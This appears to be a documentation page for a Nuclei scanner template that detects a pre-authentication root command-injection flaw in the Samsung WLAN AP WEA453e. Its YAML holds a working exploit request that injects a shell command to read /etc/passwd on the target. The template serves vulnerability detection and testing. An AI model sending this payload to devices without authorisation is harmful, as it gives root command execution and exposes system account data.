Samsung WLAN AP WEA453e - Remote Code Execution
ID: samsung-wlan-ap-rce
Severity: critical
Author: pikpikcu
Tags: xss,samsung,rce
Description
Section titled “Description”Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
YAML Source
Section titled “YAML Source”id: samsung-wlan-ap-rce
info: name: Samsung WLAN AP WEA453e - Remote Code Execution author: pikpikcu severity: critical description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in. reference: - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 1 tags: xss,samsung,rce
http: - method: POST path: - "{{BaseURL}}/(download)/tmp/poc.txt"
body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "bin:.*:1:1" part: body
- type: status status: - 200# digest: 4a0a00473045022100dbfe91262df45636f71ece0248b39ae1b76cd7aace7a2bb76790909404bf3bac022047c839c4c317af7ad67673d9dadb33a1b6b2c504c5bd91401c3936021413f670:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml"